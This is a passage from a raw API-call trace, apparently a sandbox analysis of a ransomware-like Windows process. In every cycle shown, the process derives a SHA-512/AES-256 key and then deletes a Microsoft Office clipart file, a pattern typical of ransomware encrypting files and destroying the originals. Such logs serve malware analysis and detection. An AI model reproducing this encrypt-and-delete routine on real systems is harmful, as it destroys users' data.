pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0197.535] wcslen (_String="\\\\?\\") returned 0x4 [0197.541] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 1 [0197.541] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01630_.wmf")) returned 1 [0197.543] CryptDestroyKey (hKey=0x9ad138) returned 1 [0197.543] wcslen (_String="OK") returned 0x2 [0197.543] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.543] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.543] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0197.543] CryptDestroyHash (hHash=0x9ad638) returned 1 [0197.543] CryptReleaseContext (hProv=0x8e2f78, dwFlags=0x0) returned 1 [0197.545] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0197.545] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.545] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad238) returned 1 [0197.545] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0197.545] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0197.545] wcslen (_String="\\\\?\\") returned 0x4 [0197.667] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF") returned 1 [0197.667] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01631_.wmf")) returned 1 [0197.668] CryptDestroyKey (hKey=0x9ad138) returned 1 [0197.668] wcslen (_String="OK") returned 0x2 [0197.668] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.668] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.668] CryptDestroyKey (hKey=0x9ad238) returned 1 [0197.668] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0197.668] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0197.670] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449bc | out: phHash=0x1d4449bc) returned 1 [0197.670] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.670] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d4449c0 | out: phKey=0x1d4449c0*=0x9ad438) returned 1 [0197.670] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0197.670] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0197.670] wcslen (_String="\\\\?\\") returned 0x4 [0197.686] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF") returned 1 [0197.686] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01761_.wmf")) returned 1 [0197.687] CryptDestroyKey (hKey=0x9ad778) returned 1 [0197.687] wcslen (_String="OK") returned 0x2 [0197.687] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.687] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.687] CryptDestroyKey (hKey=0x9ad438) returned 1 [0197.687] CryptDestroyHash (hHash=0x9ad738) returned 1 [0197.687] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0197.689] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444944 | out: phHash=0x1d444944) returned 1 [0197.689] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.689] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444948 | out: phKey=0x1d444948*=0x9ad1b8) returned 1 [0197.689] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0197.689] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0197.689] wcslen (_String="\\\\?\\") returned 0x4 [0197.701] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 1 [0197.701] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01772_.wmf")) returned 1 [0197.702] CryptDestroyKey (hKey=0x9ad178) returned 1 [0197.702] wcslen (_String="OK") returned 0x2 [0197.702] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.702] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.702] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0197.702] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0197.702] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0197.704] CryptCreateHash (in: hProv=0x8e3440, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44474c | out: phHash=0x1d44474c) returned 1 [0197.704] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.704] CryptDeriveKey (in: hProv=0x8e3440, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d444750 | out: phKey=0x1d444750*=0x9ad878) returned 1 [0197.704] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0197.704] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0197.704] wcslen (_String="\\\\?\\") returned 0x4 [0197.800] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 1 [0197.800] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01793_.wmf")) returned 1 [0197.801] CryptDestroyKey (hKey=0x9ad378) returned 1 [0197.801] wcslen (_String="OK") returned 0x2 [0197.802] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.802] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.802] CryptDestroyKey (hKey=0x9ad878) returned 1 [0197.802] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0197.802] CryptReleaseContext (hProv=0x8e3440, dwFlags=0x0) returned 1 [0197.804] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0197.804] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.804] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad778) returned 1 [0197.804] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0197.804] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0197.804] wcslen (_String="\\\\?\\") returned 0x4 [0197.814] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID") returned 1 [0197.814] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\east_01.mid")) returned 1 [0197.815] CryptDestroyKey (hKey=0x9ad478) returned 1 [0197.815] wcslen (_String="OK") returned 0x2 [0197.815] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.815] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.815] CryptDestroyKey (hKey=0x9ad778) returned 1 [0197.815] CryptDestroyHash (hHash=0x9ad438) returned 1 [0197.815] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0197.817] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448fc | out: phHash=0x1d4448fc) returned 1 [0197.817] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.817] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d444900 | out: phKey=0x1d444900*=0x9ad238) returned 1 [0197.817] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0197.817] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0197.817] wcslen (_String="\\\\?\\") returned 0x4 [0197.933] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 1 [0197.934] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00010_.wmf")) returned 1 [0197.935] CryptDestroyKey (hKey=0x9ad278) returned 1 [0197.935] wcslen (_String="OK") returned 0x2 [0197.935] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.935] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0197.935] CryptDestroyKey (hKey=0x9ad238) returned 1 [0197.936] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0197.936] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0197.939] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0197.939] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0197.939] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad2b8) returned 1 [0197.939] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0197.939] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0197.939] wcslen (_String="\\\\?\\") returned 0x4 [0198.048] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF") returned 1 [0198.048] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00019_.wmf")) returned 1 [0198.049] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0198.049] wcslen (_String="OK") returned 0x2 [0198.049] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0198.049] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0198.049] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0198.049] CryptDestroyHash (hHash=0x9ad438) returned 1 [0198.049] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0198.051] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0198.051] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0198.051] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad6b8) returned 1 [0198.051] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0198.051] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0198.051] wcslen (_String="\\\\?\\") returned 0x4 [0198.192] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 1 [0198.192] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00172_.wmf")) returned 1 [0198.193] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0198.193] wcslen (_String="OK") returned 0x2 [0198.193] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0198.194] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0198.194] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0198.194] CryptDestroyHash (hHash=0x9ad438) returned 1 [0198.194] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0198.196] CryptCreateHash (in: hProv=0x8e2f78, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0198.196] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0198.196] CryptDeriveKey (in: hProv=0x8e2f78, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad6b8) returned 1 [0198.196] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0198.196] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0198.196] wcslen (_String="\\\\?\\") returned 0x4 [0198.659] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF") returned 1 [0198.659] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00184_.wmf")) returned 1 [0198.661] CryptDestroyKey (hKey=0x9ad878) returned 1 [0198.661] wcslen (_String="OK") returned 0x2 [0198.661] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0198.661] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0198.661] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0198.661] CryptDestroyHash (hHash=0x9ad738) returned 1 [0198.661] CryptReleaseContext (hProv=0x8e2f78, dwFlags=0x0) returned 1 [0198.663] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a04 | out: phHash=0x1d444a04) returned 1 [0198.663] CryptHashData (hHash=0x9ad678, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0198.663] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad678, dwFlags=0x4, phKey=0x1d444a08 | out: phKey=0x1d444a08*=0x9ad7f8) returned 1 [0198.663] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0198.663] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0198.663] wcslen (_String="\\\\?\\") returned 0x4 [0198.776] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 1 [0198.776] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00006_.wmf")) returned 1 [0198.777] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0198.777] wcslen (_String="OK") returned 0x2 [0198.777] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0198.777] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0198.777] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0198.777] CryptDestroyHash (hHash=0x9ad678) returned 1 [0198.777] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0198.779] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448e4 | out: phHash=0x1d4448e4) returned 1 [0198.780] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0198.780] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d4448e8 | out: phKey=0x1d4448e8*=0x9ad838) returned 1 [0198.780] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0198.780] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0198.780] wcslen (_String="\\\\?\\") returned 0x4 [0198.951] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 1 [0198.951] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00202_.wmf")) returned 1 [0198.952] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0198.952] wcslen (_String="OK") returned 0x2 [0198.952] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0198.952] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0198.952] CryptDestroyKey (hKey=0x9ad838) returned 1 [0198.952] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0198.952] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0198.954] CryptCreateHash (in: hProv=0x8e34c8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44492c | out: phHash=0x1d44492c) returned 1 [0198.954] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0198.954] CryptDeriveKey (in: hProv=0x8e34c8, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d444930 | out: phKey=0x1d444930*=0x9ad238) returned 1 [0198.954] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0198.954] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0198.954] wcslen (_String="\\\\?\\") returned 0x4 [0198.958] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 1 [0198.958] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00222_.wmf")) returned 1 [0198.959] CryptDestroyKey (hKey=0x9ad778) returned 1 [0198.959] wcslen (_String="OK") returned 0x2 [0198.959] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0198.959] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0198.959] CryptDestroyKey (hKey=0x9ad238) returned 1 [0198.959] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0198.959] CryptReleaseContext (hProv=0x8e34c8, dwFlags=0x0) returned 1 [0198.960] CryptCreateHash (in: hProv=0x8e3770, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0198.960] CryptHashData (hHash=0x9ad678, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0198.960] CryptDeriveKey (in: hProv=0x8e3770, Algid=0x6610, hBaseData=0x9ad678, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad378) returned 1 [0198.961] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0198.961] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0198.961] wcslen (_String="\\\\?\\") returned 0x4 [0198.967] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 1 [0198.967] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00242_.wmf")) returned 1 [0198.968] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0198.968] wcslen (_String="OK") returned 0x2 [0198.968] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0198.968] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0198.968] CryptDestroyKey (hKey=0x9ad378) returned 1 [0198.968] CryptDestroyHash (hHash=0x9ad678) returned 1 [0198.968] CryptReleaseContext (hProv=0x8e3770, dwFlags=0x0) returned 1 [0198.970] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44495c | out: phHash=0x1d44495c) returned 1 [0198.970] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0198.970] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d444960 | out: phKey=0x1d444960*=0x9ad238) returned 1 [0198.970] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0198.970] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0198.970] wcslen (_String="\\\\?\\") returned 0x4 [0198.973] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF") returned 1 [0198.973] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00319_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00319_.wmf")) returned 1 [0198.974] CryptDestroyKey (hKey=0x9ad278) returned 1 [0198.974] wcslen (_String="OK") returned 0x2 [0198.974] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0198.974] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0198.974] CryptDestroyKey (hKey=0x9ad238) returned 1 [0198.974] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0198.974] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0198.976] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a1c | out: phHash=0x1d444a1c) returned 1 [0198.976] CryptHashData (hHash=0x9ad378, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0198.976] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad378, dwFlags=0x4, phKey=0x1d444a20 | out: phKey=0x1d444a20*=0x9ad2f8) returned 1 [0198.976] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0198.976] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0198.976] wcslen (_String="\\\\?\\") returned 0x4 [0199.063] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF") returned 1 [0199.063] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00320_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00320_.wmf")) returned 1 [0199.064] CryptDestroyKey (hKey=0x9ad578) returned 1 [0199.064] wcslen (_String="OK") returned 0x2 [0199.064] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.064] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.064] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0199.064] CryptDestroyHash (hHash=0x9ad378) returned 1 [0199.064] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0199.065] CryptCreateHash (in: hProv=0x8e2cd0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a04 | out: phHash=0x1d444a04) returned 1 [0199.065] CryptHashData (hHash=0x9ad5f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.065] CryptDeriveKey (in: hProv=0x8e2cd0, Algid=0x6610, hBaseData=0x9ad5f8, dwFlags=0x4, phKey=0x1d444a08 | out: phKey=0x1d444a08*=0x9ad5b8) returned 1 [0199.065] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.065] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.066] wcslen (_String="\\\\?\\") returned 0x4 [0199.219] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF") returned 1 [0199.219] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00397_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00397_.wmf")) returned 1 [0199.220] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0199.220] wcslen (_String="OK") returned 0x2 [0199.220] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.220] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0199.220] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0199.220] CryptDestroyHash (hHash=0x9ad5f8) returned 1 [0199.220] CryptReleaseContext (hProv=0x8e2cd0, dwFlags=0x0) returned 1 [0199.222] CryptCreateHash (in: hProv=0x8e34c8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0199.222] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0199.222] CryptDeriveKey (in: hProv=0x8e34c8, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad438) returned 1 [0199.222] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0199.222] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0199.222] wcslen (_String="\\\\?\\") returned 0x4 [0199.293] PathFileExistsW (pszPath="\\\\?\\C:\\Program 